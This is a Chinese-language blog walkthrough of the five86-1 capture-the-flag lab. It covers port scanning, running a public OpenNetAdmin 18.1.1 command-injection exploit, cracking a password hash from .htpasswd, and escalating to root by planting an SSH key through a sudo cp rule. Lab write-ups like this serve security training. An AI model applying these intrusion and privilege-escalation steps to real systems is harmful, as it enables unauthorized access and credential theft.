five86-1靶机

最新推荐文章于 2024-01-24 22:10:30 发布

gaynell

最新推荐文章于 2024-01-24 22:10:30 发布

阅读量161

点赞数 1

分类专栏：靶机系列文章标签：网络服务器系统安全安全威胁分析

本文链接：https://blog.csdn.net/weixin_48539059/article/details/129961743

版权

靶机系列专栏收录该内容

12 篇文章 3 订阅

订阅专栏

five86-1靶机

环境：下载靶机、解压、VMware打开，并将其和kali虚拟机的网络调成NAT模式

一.明确目标

探测目标主机IP情况

nmap 192.168.107.0/24

在这里插入图片描述

目标主机IP：192.168.107.131

Kali的IP：192.168.107.132

二.信息搜集

Nmap 进行常规端口开放扫描

进行namp全端口服务枚举

nmap 192.168.107.131 -p- -A

在这里插入图片描述

可以看到目标靶机上开放的端口，22端口 ssh,80端口 http,以及10000/tcp open http MiniServ 1.920 (Webmin httpd)

对该网站目录进行爆破枚举，利用到的是kali上的dirb：

dirsearch -u 192.168.107.131

在这里插入图片描述

http://192.168.107.131/ona/

http://192.168.107.131/reports

http://192.168.107.131/robots.txt

分别访问其目录

http://192.168.107.131/ona/

在这里插入图片描述

百度查询一下opennetadmin

OpenNetAdmin 提供了一个数据库管理库存的IP网络.每个主机可以跟踪通过一个集中的AJAX的web界面，可以帮助减少跟踪误差，并为您提供的一个工具.该项目OpenNetAdmin希望能提供一个有用的网络管理应用程序，用于管理您的IP子网和主机. 停止使用的电子表格来管理您的网络！

再查看一下版本信息，发现是18.1.1版本

在这里插入图片描述

http://192.168.107.131/reports

在这里插入图片描述

三.漏洞利用

在kali中搜索有无漏洞可以利用

searchsploit OpenNetAdmin 18.1.1

在这里插入图片描述

将其下载在kali上

searchsploit -m 47691.sh

在这里插入图片描述

命令注入脚本

直接使用命令注入脚本不好用，要用 dos2unix 47691.sh 命令将dos格式转换成unix格式

 dos2unix 47691.sh
 bash 47691.sh http://192.168.8.141/ona/

在这里插入图片描述

下面进行提权，但是这里不能执行的命令没有回显提示的，cd命令不可用，ls和cat命令可以用。

在这里插入图片描述

这里肯定是有权限控制的，可以使用find / -type f -user www-data命令查看这个用户可以读取的文件，除了/proc 就是/var/www/html/reports/.htaccess和/var/log/ona.log

find / -type f -user www-data

在这里插入图片描述

读取 var/www/html/reports/.htaccess 可以找到 AuthUserFile 的路径 /var/www/.htpasswd

在这里插入图片描述

读取这个文件如下，可以得到用户名 douglas 和HASH的密码 $apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1 ，给的提示是 只包含aefhrt的十个字符

在这里插入图片描述

尝试爆破密码

使用hash-identifier工具查找hash类型

hash-identifier

在这里插入图片描述

结果：hash -type : [+] MD5(APR)

生成字典

crunch 10 10 aefhrt -o password.txt    

第一个10：最短长度
第二个10：最长长度
-o：输出为文件

在这里插入图片描述

爆破hash

方法一：这里使用哈希猫（hashcat)爆破，首先查找hash类型的编号

 hashcat -h | grep APR 
 查找MD5（APR）的编号

在这里插入图片描述

hashcat -m 1600 -a 0 hash.txt zpassword.txt --force  (zpassword.txt自己准备的字典）

-m        指定hash模式
-a        指定破解模式，0为用字典爆破
-o        结果输出到文件
--force   忽略警告信息
得到密码fatherrrrr

方法二：使用john破解

john --wordlist=password.txt hash.txt

字典模式，从单词表中或标准输入中读取hash.txt中的词汇

在这里插入图片描述

四.提权

得到的密码进行SSH登录（douglas：fatherrrrr)

在这里插入图片描述

find / --perm -4000 2>/dev/null

在这里插入图片描述

无结果，尝试sudo -l

在这里插入图片描述

发现可以用jen用户的身份执行/bin/cp，且无密码。

既然可以往jen家目录里拷贝文件，那就把douglas的ssh公钥拷到jen中，实现ssh免密登录。我们ls -a,发现了.ssh目录，进入找到了存放ssh公钥的文件id_rsa.pub

在这里插入图片描述

cp .ssh/id_rsa.pub /tmp/authorized_keys
chmod 777 /tmp/authorized_keys 
sudo -u jen /bin/cp /tmp/authorized_keys /home/jen/.ssh/

在这里插入图片描述

登录后发现jen收到了一封邮件，查看邮件

在这里插入图片描述

邮件中我们得到了用户moss以及密码Fire!Fire!

登录moss

在这里插入图片描述

查看moss家目录，发现了一个隐藏目录为.games，查看.games看到upyourgame的所属者和所属组有点意思，全是root，并且可执行

在这里插入图片描述

执行 upyourgame,一路yes

在这里插入图片描述

在root家目录中拿到flag

gaynell

关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
0
评论
five86-1靶机

OpenNetAdmin 提供了一个数据库管理库存的IP网络.每个主机可以跟踪通过一个集中的AJAX的web界面，可以帮助减少跟踪误差，并为您提供的一个工具.该项目OpenNetAdmin希望能提供一个有用的网络管理应用程序，用于管理您的IP子网和主机. 停止使用的电子表格来管理您的网络！查看moss家目录，发现了一个隐藏目录为.games，查看.games看到upyourgame的所属者和所属组有点意思，全是root，并且可执行。发现可以用jen用户的身份执行/bin/cp，且无密码。
复制链接

扫一扫